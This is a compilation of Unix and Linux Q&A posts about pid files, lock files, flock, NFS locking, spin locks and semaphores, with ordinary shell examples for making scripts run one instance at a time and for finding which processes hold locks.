pid files are written by some programs to record their process ID while they are starting. This has multiple purposes:

It's a signal to other processes and users of the system that that particular program is running, or at least started successfully.
It allows one to write a very simple script that checks whether the program is running and issues a plain kill command if one wants to end it.
It's a cheap way for a program to see whether a previously running instance of it exited uncleanly.

The mere presence of a pid file doesn't guarantee that that particular process ID is still running, of course, so this method isn't 100% foolproof, but it is "good enough" in a lot of instances. Checking whether a particular PID exists in the process table isn't totally portable across UNIX-like operating systems unless you want to depend on the ps utility, which may not be desirable to call in all instances (and some UNIX-like operating systems implement ps differently anyway).

The idea with lock files is the following: two (well-behaved) separate instances of a program, which may be running concurrently on one system, should not access the same resource at the same time. Before the program accesses its resource, it checks for the presence of a lock file; if the lock file exists, it either errors out or waits for it to go away. When the lock file doesn't exist, the program wanting to "acquire" the resource creates it, and other instances that come along later will wait for this process to be done with it. Of course, this assumes the program "acquiring" the lock does in fact release it and doesn't forget to delete the lock file. This works because the filesystem under all UNIX-like operating systems enforces serialization, which means only one change to the filesystem actually happens at any given time - sort of like locks with databases and such.

Operating systems or runtime platforms typically offer proper synchronization primitives, and it's usually better to use those instead. But there are situations, such as writing something meant to run on a wide variety of operating systems past and future without a reliable library to abstract the calls (for example sh or bash scripts meant to work on a wide variety of Unix flavors), where this scheme may be a good compromise.
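As a rough illustration, a check along those lines might look like this in shell (a sketch only; /var/run/mydaemon.pid is a made-up path for a hypothetical daemon):

#!/bin/sh
# Sketch of the pid-file check described above.
pidfile=/var/run/mydaemon.pid

if [ -f "$pidfile" ]; then
    pid=$(cat "$pidfile")
    # kill -0 sends no signal; it only tests whether the PID exists
    # and we are allowed to signal it.
    if kill -0 "$pid" 2>/dev/null; then
        echo "mydaemon appears to be running with PID $pid"
    else
        echo "stale pid file: no process with PID $pid"
    fi
else
    echo "mydaemon does not appear to be running (no pid file)"
fi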
I often see that programs specify pid and lock files. And I'm not quite sure what they do. For example, when compiling nginx:

--pid-path=/var/run/nginx.pid \
--lock-path=/var/lock/nginx.lock \

Can somebody shed some light on this one?
What are pid and lock files for?
lslocks, from the util-linux package, does exactly this. In the MODE column, processes waiting for a lock will be marked with a *.
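For example, to narrow the output to one file without relying on a particular column layout (a sketch; adjust the path):

# Show holders and waiters for a given file; a trailing * in the MODE
# column (e.g. WRITE*) marks a process waiting for the lock.
lslocks | grep '/path/to/X'

# Count only the waiters (rows whose MODE ends in *).
lslocks | grep '/path/to/X' | grep -c '\*'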
Using flock, several processes can have a shared lock at the same time, or be waiting to acquire a write lock. How do I get a list of these processes? That is, for a given file X, I'd ideally like to find the process ID of each process which either holds, or is waiting for, a lock on the file. It would be a very good start though just to get a count of the number of processes waiting for a lock.
How to list processes locking file?
Here's another way to do locking in a shell script that can prevent the race condition you describe above, where two jobs may both pass line 3. The noclobber option will work in ksh and bash. Don't use set noclobber because you shouldn't be scripting in csh/tcsh. ;)

lockfile=/var/tmp/mylock

if ( set -o noclobber; echo "$$" > "$lockfile") 2> /dev/null; then
    trap 'rm -f "$lockfile"; exit $?' INT TERM EXIT
    # do stuff here
    # clean up after yourself, and release your trap
    rm -f "$lockfile"
    trap - INT TERM EXIT
else
    echo "Lock Exists: $lockfile owned by $(cat $lockfile)"
fi

YMMV with locking on NFS (you know, when NFS servers are not reachable), but in general it's much more robust than it used to be (10 years ago). If you have cron jobs that do the same thing at the same time, from multiple servers, but you only need one instance to actually run, then something like this might work for you.

I have no experience with lockrun, but having a pre-set lock environment prior to the script actually running might help. Or it might not. You're just setting the test for the lockfile outside your script in a wrapper, and theoretically, couldn't you just hit the same race condition if two jobs were called by lockrun at exactly the same time, just as with the 'inside-the-script' solution?

File locking is pretty much honor-system behavior anyway, and any scripts that don't check for the lockfile's existence prior to running will do whatever they're going to do. Just by putting in the lockfile test, and proper behavior, you'll be solving 99% of potential problems, if not 100%. If you run into lockfile race conditions a lot, it may be an indicator of a larger problem, like not having your jobs timed right, or, if the interval is not as important as the job completing, maybe your job is better suited to be daemonized.

EDIT BELOW - 2016-05-06 (if you're using KSH88)

Based on @Clint Pachl's comment below, if you use ksh88, use mkdir instead of noclobber. This mostly mitigates a potential race condition, but doesn't entirely eliminate it (though the risk is minuscule). For more information read the link that Clint posted below.

lockdir=/var/tmp/mylock
pidfile=/var/tmp/mylock/pid

if ( mkdir ${lockdir} ) 2> /dev/null; then
    echo $$ > $pidfile
    trap 'rm -rf "$lockdir"; exit $?' INT TERM EXIT
    # do stuff here
    # clean up after yourself, and release your trap
    rm -rf "$lockdir"
    trap - INT TERM EXIT
else
    echo "Lock Exists: $lockdir owned by $(cat $pidfile)"
fi

And, as an added advantage, if you need to create tmpfiles in your script, you can use the lockdir directory for them, knowing they will be cleaned up when the script exits. For more modern bash, the noclobber method at the top should be suitable.
Sometimes you have to make sure that only one instance of a shell script is running at the same time - for example, a cron job which is executed via a crond that does not provide locking on its own (e.g. the default Solaris crond). A common pattern to implement locking is code like this:

#!/bin/sh
LOCK=/var/tmp/mylock
if [ -f $LOCK ]; then            # 'test' -> race begin
    echo Job is already running\!
    exit 6
fi
touch $LOCK                      # 'set' -> race end
# do some work
rm $LOCK

Of course, such code has a race condition. There is a time window where the execution of two instances can both advance past line 3 before one is able to touch the $LOCK file. For a cron job this is usually not a problem because you have an interval of minutes between two invocations. But things can go wrong - for example when the lockfile is on an NFS server that hangs. In that case several cron jobs can block on line 3 and queue up. If the NFS server becomes active again then you have a thundering herd of parallel running jobs.

Searching on the web I found the tool lockrun which seems like a good solution to that problem. With it you run a script that needs locking like this:

$ lockrun --lockfile=/var/tmp/mylock myscript.sh

You can put this in a wrapper or use it from your crontab. It uses lockf() (POSIX) if available and falls back to flock() (BSD). And lockf() support over NFS should be relatively widespread.

Are there alternatives to lockrun? What about other cron daemons? Are there common cronds that support locking in a sane way? A quick look into the man page of Vixie Crond (default on Debian/Ubuntu systems) does not show anything about locking. Would it be a good idea to include a tool like lockrun into coreutils? In my opinion it implements a theme very similar to timeout, nice and friends.
Correct locking in shell scripts?
Almost like nsg's answer: use a lock directory. Directory creation is atomic under Linux and Unix and *BSD and a lot of other OSes.

if mkdir -- "$LOCKDIR"
then
    # Do important, exclusive stuff
    if rmdir -- "$LOCKDIR"
    then
        echo "Victory is mine"
    else
        echo "Could not remove lock dir" >&2
    fi
else
    # Handle error condition
    ...
fi

You can put the PID of the locking sh into a file in the lock directory for debugging purposes, but don't fall into the trap of thinking you can check that PID to see if the locking process still executes. Lots of race conditions lie down that path.
A solution that does not require additional tools would be prefered.
How to make sure only one instance of a bash script runs?
A spin lock is a way to protect a shared resource from being modified by two or more processes simultaneously. The first process that tries to modify the resource "acquires" the lock and continues on its way, doing what it needed to with the resource. Any other processes that subsequently try to acquire the lock get stopped; they are said to "spin in place" waiting on the lock to be released by the first process, thus the name spin lock.

The Linux kernel uses spin locks for many things, such as when sending data to a particular peripheral. Most hardware peripherals aren't designed to handle multiple simultaneous state updates. If two different modifications have to happen, one has to strictly follow the other; they can't overlap. A spin lock provides the necessary protection, ensuring that the modifications happen one at a time.

Spin locks are a problem because spinning blocks that thread's CPU core from doing any other work. While the Linux kernel does provide multitasking services to user space programs running under it, that general-purpose multitasking facility doesn't extend to kernel code.

This situation is changing, and has been for most of Linux's existence. Up through Linux 2.0, the kernel was almost purely a single-tasking program: whenever the CPU was running kernel code, only one CPU core was used, because there was a single spin lock protecting all shared resources, called the Big Kernel Lock (BKL). Beginning with Linux 2.2, the BKL is slowly being broken up into many independent locks that each protect a more focused class of resource. Today, with kernel 2.6, the BKL still exists, but it's only used by really old code that can't be readily moved to some more granular lock. It is now quite possible for a multicore box to have every CPU running useful kernel code.

There's a limit to the utility of breaking up the BKL because the Linux kernel lacks general multitasking. If a CPU core gets blocked spinning on a kernel spin lock, it can't be retasked to go do something else until the lock is released; it just sits and spins. Spin locks can effectively turn a monster 16-core box into a single-core box, if the workload is such that every core is always waiting for a single spin lock. This is the main limit to the scalability of the Linux kernel: doubling CPU cores from 2 to 4 probably will nearly double the speed of a Linux box, but doubling it from 16 to 32 probably won't, with most workloads.
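The kernel implements spin locks with atomic CPU instructions, but the spinning behaviour itself can be illustrated with a user-space shell analogy (a toy sketch only, not kernel code; the lock directory path is made up):

# Toy user-space analogy of a spin lock: mkdir either creates the lock
# directory atomically or fails, and the caller busy-loops until it wins.
lockdir=/tmp/spinlock.d    # hypothetical lock path

spin_acquire() {
    until mkdir "$lockdir" 2>/dev/null; do
        :    # "spin in place" - burning CPU exactly like a real spin lock
    done
}

spin_release() {
    rmdir "$lockdir"
}

spin_acquire
# ... critical section: touch the shared resource here ...
spin_release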
I would like to know about Linux spinlocks in detail; could someone explain them to me?
What is a spinlock in Linux?
Since you're using >>, which means append, each line of output from each instance will be appended in the order it occurred. If your script's output prints 1\n through 5\n with a one-second delay between each, and instance two is started 2.5 seconds later, you'll get this:

1
2
1
3
2
4
3
5
4
5

So to answer your question: No.
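If you want to reproduce the interleaving yourself, here's a quick sketch (numbers.log and the A/B labels are made up):

# Two instances appending to the same log with >>; their lines interleave
# in write order and neither instance blocks or fails.
print_slowly() { for i in 1 2 3 4 5; do echo "$1: $i"; sleep 1; done; }
print_slowly A >> numbers.log &
sleep 2.5
print_slowly B >> numbers.log &
wait
cat numbers.log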
If I have a command

$ ./script >> file.log

that gets called twice, with the second call occurring before the first one ends, what happens? Does the first call get an exclusive lock on the output file? If so, does the second script fail when attempting to write, or does the shell accept the output (allowing the script to end) and throw an error? Or does the log file get written to twice?
Does redirecting output to a file apply a lock on the file?
I found these methods on Ubuntu Forums in a thread titled "How do I lock the screen in XFCE?", excerpted from 2 of the answers in that thread.

Method #1 - Keyboard shortcut
Open the settings manager > keyboard > shortcuts and you can see that the default shortcut to lock the screen is ctrl-alt-del. If you want to change it, click add on the left, type in a name for your list of shortcuts (widen the window so you can see the whole thing), select the xflock4 shortcut on the right and enter the new key combo.

Method #2 - via command line
$ xflock4

Method #3 - XScreenSaver
Most of the time I use XScreenSaver on a multitude of Linux distros. It's fairly ubiquitous. Excerpt from the developer's website:

XScreenSaver is the standard screen saver collection shipped on most Linux and Unix systems running the X11 Window System. I released the first version in 1992. I ported it to MacOS X in 2006, and to iOS in 2012. On X11 systems, XScreenSaver is two things: it is both a large collection of screen savers; and it is also the framework for blanking and locking the screen. On MacOS systems, these screen savers work with the usual MacOS screen saving framework (X11 is not required). On iOS devices, it is an application that lets you run each of the demo modes manually.

There are tons of screenshots of the various screensavers, and XScreenSaver provides screen locking as well: http://www.jwz.org/xscreensaver/screenshots/
I am looking for a simple way to lock my session in Xfce (Debian Unstable). I don't want to have to type my password at every wake-up, but I want to be able to press a shortcut (which launches a command line) that asks for identification. The use case is to lock my laptop when I leave the office for lunch: I want to press this shortcut before closing the screen (and so putting the laptop to suspend). If someone tries to wake it up, they will have to enter the password.
How to lock my session in Xfce?
For most use cases of flock, it's very important that the lock file not be "cleaned up". Otherwise, imagine this scenario:

process A opens the lock file, finds it does not exist, so it creates it.
process A acquires the lock.
process B opens the lock file (finds it already exists).
process B tries to acquire the lock but has to wait.
process A releases the lock.
process B acquires the lock instantly.
process A deletes the lock file.
process C opens the lock file, finds it does not exist, so it creates a new one. Note that it is now holding open a different lock file than the one that process B has locked.
process C tries to acquire the lock and succeeds... but it should have had to wait, because process B still has [a prior incarnation of] the lock file open and locked.
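This is why the usual flock pattern leaves the lock file in place permanently; a minimal sketch (the path is arbitrary):

# The lock file is never removed: it exists only to be locked, so a
# zero-byte /tmp/myjob.lock lying around is harmless and avoids the
# delete/recreate race described above.
exec 9>/tmp/myjob.lock
if ! flock -n 9; then
    echo "another instance is running" >&2
    exit 1
fi
# ... do the real work while holding the lock ...
# The lock is released automatically when fd 9 is closed at exit.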
After the process is completed, I see that the lock file isn't deleted. Is there any reason why flock keeps the file? Also, how does flock know if there is a lock acquired? Here is the example from a crontab file:

* * * * * flock python <script_name>.py
Why flock doesn't clean the lock file? [closed]
apt 1.9.11

This was solved in Debian bug #754103 in this commit. The fix is in versions of apt newer than 1.9.11.

apt(8): Wait for lock (Closes: #754103)

You can enable this option by setting -o DPkg::Lock::Timeout=60 as an argument to apt or apt-get, where 60 is the time to wait in seconds for the lock.

apt -o DPkg::Lock::Timeout=60 install FOO
apt-get -o DPkg::Lock::Timeout=60 install FOO

You can test this by running two identical commands and simply not answering immediately on the first one to Do you want to continue? [Y/n]. On the second command you run, it'll tell you:

Waiting for cache lock: Could not get lock /var/lib/dpkg/lock-frontend. It is held by process 946299 (apt)
If you are running apt-get commands in a terminal and want to install stuff in the Software Center, the center says it waits until apt-get finishes. I wanted to know if it is possible to do the same but on the terminal, i.e., make apt-get on the terminal wait until the lock is released. I found this link, that uses aptdcon to install stuff. I would like to know:

Is it really not possible to do with apt-get?
Is aptdcon compatible with apt-get, i.e., can I use both to install stuff without borking the system?
apt-get wait for lock release
Both manage a limited resource. I'll first describe the difference between a binary semaphore (mutex) and a spin lock.

Spin locks perform a busy wait - i.e. they keep running a loop:

while (try_acquire_resource ());
...
release();

This makes locking/unlocking very lightweight, but if the locking thread is preempted by another thread that tries to access the same resource, the second one will simply keep trying to acquire the resource until it runs out of its CPU quantum.

On the other hand, a mutex behaves more like:

if (!try_lock()) {
    add_to_waiting_queue ();
    wait();
}
...
process *p = get_next_process_from_waiting_queue ();
p->wakeUp ();

Hence if a thread tries to acquire a blocked resource, it will be suspended until the resource is available for it. Locking/unlocking is much heavier, but the waiting is 'free' and 'fair'.

A semaphore is a lock that is allowed to be held a certain number of times simultaneously (known from initialization) - for example, 3 threads are allowed to hold the resource at once, but no more. It is used for example in the producer/consumer problem, or in general with queues:

P(resources_sem)
resource = resources.pop()
...
resources.push(resource)
V(resources_sem)
What are the basic differences between spin locks and semaphores in action?
What is the difference between spin locks and semaphores?
Invoke a shell explicitly:

flock -x -w 5 ~/counter.txt sh -c 'COUNTER=$(cat ~/counter.txt); echo $((COUNTER + 1)) > ~/counter.txt'

Note that any variable you change is local to that shell instance. For example, the COUNTER variable will not be updated in the calling script: you'll have to read it back from the file (but it may have changed in the meantime), or obtain it as the output of the command:

new_counter=$(flock -x -w 5 ~/counter.txt sh -c 'COUNTER=$(cat ~/counter.txt); echo $((COUNTER + 1)) | tee ~/counter.txt')
flock -x -w 5 ~/counter.txt 'COUNTER=$(cat ~/counter.txt); echo $((COUNTER + 1)) > ~/counter.txt'

How would I pass multiple commands to flock as in the example above? As far as I understand, flock takes different flags (-x for exclusive, -w for timeout), then the file to lock, and then the command to run. I'm not sure how I would pass two commands into this function (set a variable with the locked file's contents, and then increment this file). My goal here is to create a somewhat atomic increment for a file by locking it each time a script tries to access the counter.txt file.
Pass multiple commands to flock
Yes, locks are preserved across exec. Locks are preserved across the underlying system call execve, as long as the file descriptor remains open. File descriptors remain open across execve unless they have been configured to be closed on exec, and file descriptors created by shell redirection are not marked as close-on-exec.
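A quick way to convince yourself from a shell (a sketch; /tmp/demo.lock is just an example path):

# Take the lock on fd 9, then replace the subshell with another program.
# While the sleep runs, a second copy of this snippet fails to get the
# lock, showing that the lock survived the exec.
(
    flock -n 9 || { echo "lock is held elsewhere" >&2; exit 1; }
    exec sleep 60    # fd 9 stays open across exec, so the lock is kept
) 9>/tmp/demo.lock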
The "standard" locking snippet I've seen goes something like... ( flock -n 200 || exit 1; # do stuff ) 200>program.lockIs it safe (testing seems to say so) to use exec at that point? Will the subprocess retain the lock? ( flock -n 200 || exit 1; exec /usr/bin/python vendors-notcoolstuff.py ) 200>program.lockI vaguely remember exec'd processes retain open file descriptors and since flock uses file descriptors it should work. But I cannot find any documentation that makes that definitive and clear. For the record, this is specific to Linux.
Is flock & exec safe in bash?
/dev/shm: This is nothing but an implementation of the traditional shared memory concept. It is an efficient means of passing data between programs. One program will create a memory portion, which other processes (if permitted) can access. This results in speeding things up.

/run/lock (formerly /var/lock): contains lock files, i.e. files indicating that a shared device or other system resource is in use, and containing the identity of the process (PID) using it; this allows other processes to properly coordinate access to the shared device.

/tmp: is the location for temporary files as defined in the Filesystem Hierarchy Standard, which is followed by almost all Unix and Linux distributions. Since RAM is significantly faster than disk storage, you can use /dev/shm instead of /tmp for a performance boost, if your process is I/O intensive and extensively uses temporary files.

/run/user/$uid: is created by pam_systemd and used for storing files used by running processes for that user.

Coming to your question, you can definitely use the /run/lock directory to store your lock file.
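For instance, a script-level lock under /run/lock could look like this (a sketch; the file name is made up, and on many systems /run/lock is writable only by root, so an unprivileged script may prefer /run/user/$UID or /tmp):

# Hypothetical lock file name; requires write access to /run/lock.
exec 8>/run/lock/mytool.lock || exit 1
flock -n 8 || { echo "mytool is already running" >&2; exit 1; }
# ... critical section ...
# The lock goes away when fd 8 is closed at exit; the file itself may stay.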
I want to synchronize processes based on lock files (/ socket files). These files should only be removable by their creator user. There are plenty of choices:

/dev/shm
/var/lock
/run/lock
/run/user/<UID>
/tmp

What's the best location for this purpose? And what are the above locations meant to be used for?
Linux file hierarchy - what's the best location to store lockfiles?
Bash's processing of the command below may be surprising:

flock -x -w 5 /dev/shm/counter.txt echo "4" > /dev/shm/counter.txt && sleep 5

Bash first runs flock -x -w 5 /dev/shm/counter.txt echo "4" > /dev/shm/counter.txt and, if that completes successfully (releasing the lock), then it runs sleep 5. Thus, the lock is not held for the 5 seconds that one may expect.

Aside on & versus &&

If one has two commands, A and B, then:

A & B starts A in the background and then starts B without waiting for A to finish.
A && B starts A, waits for it to complete, and then, if it completes successfully (exit code 0), starts B. If A fails (nonzero exit code), then B is never run.

In sum, & and && are two completely different list operators.
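To hold the lock across both steps, hand flock a single child command that contains them (a sketch):

# The lock is held while the child shell runs, i.e. for the write and the sleep.
flock -x -w 5 /dev/shm/counter.txt \
    sh -c 'echo "4" > /dev/shm/counter.txt && sleep 5'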
I want to have a file that is used as a counter. User A will write and increment this number, while User B requests to read the file. Is it possible for User A to lock this file so no one can read or write to it until User A's write is finished? I've looked into flock but can't seem to get it to work as I expect.

flock -x -w 5 /dev/shm/counter.txt echo "4" > /dev/shm/counter.txt && sleep 5

If there's a more appropriate way to get this atomic-like incrementing file, that'd be great to hear too! My goal is:

LOCK counter.txt; write to counter.txt;

while at the same time:

Read counter.txt; realize it's locked, so wait until that lock is released.
Obtain exclusive read/write lock on a file for atomic updates
This is easy to solve. Issue: your microphone is not getting enough power. The Raspberry Pi USB ports have issues supplying enough amps to USB devices that need more power than USB memory cards. Solution: get an active USB hub (a powered hub plugged into a power source like an outlet). The hub will power the microphone.
On my RasPi board (Debian Linux), the USB microphone occasionally gets locked up such that nothing can use it. The microphone has an LED which is usually flashing; when it's locked, it turns off. The utility arecord describes it as follows:

card 1: Device [DYNEX USB MIC Device], device 0: USB Audio [USB Audio]
  Subdevices: 1/1
  Subdevice #0: subdevice #0

When the microphone stops working, arecord gives diagnostics like this:

> arecord -D plughw:1,0 > recording.wav
Recording WAVE 'stdin' : Unsigned 8 bit, Rate 8000 Hz, Mono
arecord: set_params:1145: Unable to install hw_params:
ACCESS:  RW_INTERLEAVED
FORMAT:  U8
etc...

Unplugging and plugging the microphone fixes it, only because the current dip forces the RasPi to reboot! Not an ideal situation. Is there a way to fix this from the command line or a C executable? I also tried using ioctl(fd, USBDEVFS_RESET, 0) using the output from lsusb to provide the bus and device number. That turns the LED back on, but it's overkill. The device has to be re-set-up using alsamixer.
RasPi - USB microphone locks up
sudo find -L /proc/458/fd -maxdepth 1 -inum 133880 -print -exec readlink {} \;

To get all of them:

while IFS=': ' read x x x x p x x i x; do
  sudo find -L "/proc/$p/fd" -maxdepth 1 -inum "$i" -exec readlink {} \; -quit
done < /proc/locks

Sometimes, the process whose pid is referenced in /proc/locks will have died. You can change the "/proc/$p/fd" above to /proc/*/fd to look for them among all processes' fds. (Note that this is an approximation, as we're only checking the inode number, not the device number, but the chances that we pick the wrong file (same inum on a different fs) are very slim.)
$ cat /proc/locks
1: POSIX  ADVISORY  WRITE 458 03:07:133880 0 EOF
2: FLOCK  ADVISORY  WRITE 404 03:07:133879 0 EOF

The fields are: ordinal number (1), type (2), mode (3), type (4), pid (5), maj:min:inode (6), start (7), end (8). Question: how do I find the corresponding file that is being locked?
Which file corresponds to an entry in /proc/locks?
Linux normally doesn't do any locking by default (contrary to Windows). This has many advantages, but if you must lock a file, you have several options. I suggest flock:

apply or remove an advisory lock on an open file. This utility manages flock(2) locks from within shell scripts or from the command line.

For a single command (or an entire script), you can use

flock --exclusive /var/lock/mylockfile -c command

If you want to execute more commands in your script under the lock, use

#!/bin/bash
....
(
  flock --nonblock 200 || exit 1
  # ... commands executed under lock ...
) 200>/var/lock/mylockfile

All operations following the flock call inside the sub-shell (...) are executed only if no other process currently holds a flock on /var/lock/mylockfile. The lock is automatically dropped after the sub-shell exits. flock can also wait until the file lock has been dropped (that's the default). In that case, do not use the --nonblock option, which makes flock fail if the lock cannot be obtained.
I have a shell script which will be executed by multiple instances, and if an instance is accessing a file and doing some operation, how can I make sure other instances are not accessing the same file and corrupting the data? My question is not about controlling the parallel execution but about dealing with a file lock or flagging mechanism. Requesting some suggestions on how to proceed.
How to make sure only one instance accessing the file at a time in a folder?
From man lsof:

FD is the File Descriptor number of the file, followed by one of these characters describing the mode under which the file is open, and then by one of these lock characters describing the type of lock applied to the file:
R for a read lock on the entire file;
W for a write lock on the entire file;
space if there is no lock.

So the R in 3uR means that a read/shared lock is held by PID 613:

# lsof /tmp/file
COMMAND PID USER    FD  TYPE DEVICE SIZE/OFF    NODE NAME
perl    613 turkish 3uR  REG    8,2        0 1306357 /tmp/file

Reading directly from /proc/locks is faster than lsof:

perl -F'[:\s]+' -wlanE'
   BEGIN { $inode = (stat(pop))[1]; @ARGV = "/proc/locks" }
   say "pid:$F[4] [$_]" if $F[7] == $inode
' /tmp/file
I would like to get a list of PIDs which hold a shared lock on /tmp/file. Is this possible using simple command-line tools?
Monitoring file locks, locked using flock
The link() system call on the NFS client should map directly to the NFS LINK operation, which the server should implement using its link() system call. So as long as link() is atomic on the server, it will also be atomic on the clients.
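So the questioner's ln trick should carry over; the traditional NFS-hardened form also checks the link count afterwards, because over NFS the ln itself can report a failure even though the link was created (a sketch; /shared/tmp is a placeholder path):

# Create a unique temp file, link() it to the agreed lock name, then
# confirm ownership via the temp file's hard-link count (2 = we won).
tmp=/shared/tmp/lock.$$.$(hostname)
lock=/shared/tmp/lock.myfile
echo "$$" > "$tmp"
ln "$tmp" "$lock" 2>/dev/null
if [ "$(stat -c %h "$tmp")" -eq 2 ]; then
    rm -f "$tmp"
    # ... we own the lock: process the file, then rm -f "$lock" ...
else
    rm -f "$tmp"
    exit 1    # someone else holds the lock
fi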
I have a cluster with a bunch of servers with a shared disk containing a GFS global file system that all nodes access simultaneously. Each node in the cluster runs the same program (a shell script is the main core). The system processes files that appear in a couple of input directories, and it works like this:

the program loops through the input directories.
for each file found, check the existence of a "lock file"; if the lock file exists, skip to the next file.
if no lock file is found, create the lock file. If lockfile creation failed (race lost), skip to the next file.
if "we" own the lock, process the file and move it out of the way when it is finished.

This all works very well, but I wonder if there are cheaper (less complex) solutions that would also work. I'm thinking NFS or SMB perhaps. There are two reasons for my use of GFS:

each file is stored in one place only (on redundant underlying hardware of course)
file locking works reliably

I create the lockfile like this:

date '+%s:'${unid} > ${currlock}.${unid}
ln ${currlock}.${unid} ${currlock}
lockrc=$?
rm -f ${currlock}.${unid}

where $unid is a unique session identifier and $currlock is /gfs/tmp/lock.${file_to_process}. The beauty of ln is that it is atomic, so it fails for all but one of the processes that attempt the same thing at the same time.

So, I guess what I'm asking is: will NFS fill my needs? Does ln work reliably in the same way on NFS as on GFS?
Is `ln` atomic and reliable on NFS? Could NFS replace GFS in this use case?
A tool such as flock can help manage locks. (It may not work with NFS, depending on whether you believe the documentation or the practice, and similarly may or may not work on SMB or indeed any other remote filesystem.) The documentation, man flock, does have several examples of use. Here's one of them tailored to your scenario.

#!/bin/bash
# Example of using flock(1) to provide a named exclusive lock

# Parse command line options
while getopts 'd:' OPT
do
    case "$OPT" in
        d)  lockParam="$OPTARG" ;;
        *)  echo "Usage: ${0##*/} -d <parameter>" >&2; exit 1
    esac
done
shift $(($OPTIND -1))

# Sanitise lock parameter value (do not trust the user)
lockName="$(printf "%s\n" "${lockParam^^}" | tr -cd '[:alnum:]\n')"
lockFile="/tmp/lock.${0##*/}.${lockName:-noname}"

echo "Attempting lock with parameter '$lockParam' sanitised to '$lockName'" >&2
(
    # Get the lock or report failure. See "man flock" for other options
    flock -n 9 || exit 9

    # This section is managed by the exclusive lock. Your program code
    # would go here.
    echo "Achieved exclusive lock on '$lockFile'" >&2

    sleep=10
    echo "Waiting for $sleep second(s) to simulate activity" >&2
    sleep $sleep

    # Exit status 0=ok, otherwise 1-8 is your choice of error codes
    echo "Releasing lock" >&2
    exit 0

    # End of exclusive lock section
) 9>"$lockFile"
ss=$?

# Report on exit status from actual code
if [ $ss -eq 9 ]
then
    echo "Failed to acquire lock" >&2
fi

# Exit with meaning
exit $ss

Make the script executable (if you call it lockeg then chmod a+x lockeg), and run it:

./lockeg -d JOHN_DOE
I'm trying to find a way to lock a script based on a parameter given, but was unsuccessful in finding a proper answer. What I'm trying to achieve is prevent another user from running a script based on some parameter: so if user A executes the script with parameter JOHN_DOE (e.g: -d JOHN_DOE) and user B executes it with parameter -d ANNA_DOE then it runs without any problems, but if user B tries to execute it with JOHN_DOE as parameter while the first instance of the script hasn't finished running then it does not allow the user B to run it. Is there a proper way to achieve this?
Lock a bash script based on parameter?
flock doesn't work over NFS. (It never has, even on UNIX systems.) See flock vs lockf on Linux for one comparison of lockf and flock. Here is a possible solution Correct locking in shell scripts?
I'm planning on having a complicated file sharing setup, and want to make sure I don't destroy file locking. (Wanting to use bind mounting, nfs, nfs over rdma (InfiniBand file sharing), and virtfs (kvm virtual machine pass-through file sharing) on the same data.) I'm at the beginning sanity checks, just testing the nfs server with a single nfs client. Both systems run up-to-date Arch, nfs-utils 1.3.2-6, kernel 4.1.6-1. I'm seeing unexpected results.

On the nfs server, the export is:

/test 192.168.0.0/16(rw,sync,no_subtree_check,no_root_squash)

The client mount shows:

192.168.1.2:/test on /test type nfs4 (rw,noatime,vers=4.2,rsize=524288,wsize=524288,namlen=255,hard,proto=tcp,port=0,timeo=600,retrans=2,sec=sys,clientaddr=192.168.1.3,local_lock=none,addr=192.168.1.2)

In /test, I have a script named lockFile with contents:

#!/bin/bash
filename="lockedFile"
exec 200>$filename
flock -n 200 || exit 1
pid=$$
while true; do
  echo $pid 1>&200
done

If I use two terminals on the nfs server:

1: ./lockFile
2: ./lockFile

then terminal 1 quickly fills up a file with its pid, and terminal 2 immediately exits. All as expected.

But, if I run a terminal each on the nfs server and client:

server: ./lockFile
client: ./lockFile

they both happily run, which is very unexpected.

In this configuration, my nfs server is running as sync, meaning the server only says data is written when it is actually written. My nfs client is running as async, meaning the client only transmits the writes when the file is closed. I could see the client running async perhaps not obtaining a lock until it actually transmits the writes, so I tested this, changing the client to sync. The client mount now shows:

192.168.1.2:/test on /test type nfs4 (rw,noatime,sync,vers=4.2,rsize=524288,wsize=524288,namlen=255,hard,proto=tcp,port=0,timeo=600,retrans=2,sec=sys,clientaddr=192.168.1.3,local_lock=none,addr=192.168.1.2)

Still, lockFile happily runs on both machines. Am I misunderstanding how NFS file locking is expected to work? Is it expected to handle server access vs client access? Or is it just for client access vs different client access?
NFS file locking not working, am I misunderstanding?
As far as I know, no. You have to close it manually:

if flock 9 -nx
then
    program 9>&-   #<= manual close of fd 9 after `program` has forked but before it execs
else
    echo "Lock held :/)" >&2
fi 9> /tmp/lk

If you want to get extra hacky, you can set the flag by calling the fcntl function directly via ctypes.sh:

#!/bin/bash

echo initial
ls /proc/$$/fd/

echo with 9
{
    ls /proc/$$/fd/
    echo with 9 in an execced child
    bash -c ' ls /proc/$$/fd/'
} 9</etc/passwd

echo
echo BEGIN MAGIC
FD_CLOEXEC=1
FD_SETFD=2
. ctypes.sh

echo initial
ls /proc/$$/fd/

echo with 9
{
    dlcall fcntl int:9 int:$FD_SETFD int:$FD_CLOEXEC
    ls /proc/$$/fd/
    echo with 9 in an execced child
    bash -c ' ls /proc/$$/fd/'
} 9</etc/passwd

Output:

initial
0 1 2 255
with 9
0 1 2 255 9
with 9 in an execced child
0 1 2 3 9

BEGIN MAGIC
initial
0 1 2 255
with 9
0 1 2 255 9
with 9 in an execced child
0 1 2 3

(Not a typo in pasting -- the 9 really did get closed when the child bash got execced.)
Can Bash execute a subprocess while preventing a subprocess from inheriting a file descriptor?

if flock -nx 9
then
    # If begin program runs away, it will keep the lock.
    begin program
else
    echo "Lock held :/)" >&2
fi 9> /tmp/lk
Bash, fork with CLOEXEC
After a small Usenet discussion I use the following as a workaround for flock -n lockfile -c command:

#! /bin/bash

if [ $# != 4 -o "$1" = '-h' ] ; then
    echo "Usage: flock -n lockfile -c command" >&2
    exit 1
fi

lockfile=$2
command=$4

set -o noclobber
if 2>/dev/null : > "$lockfile" ; then
    trap 'rm -f "$lockfile"' EXIT
    $BASH -c "$command"
else
    exit 1
fi
On Linux I use the flock command to execute a command with an exclusive lock. What is the standard operating system command on Solaris 10 to do the same in a shell?
How to lock on Solaris 10?
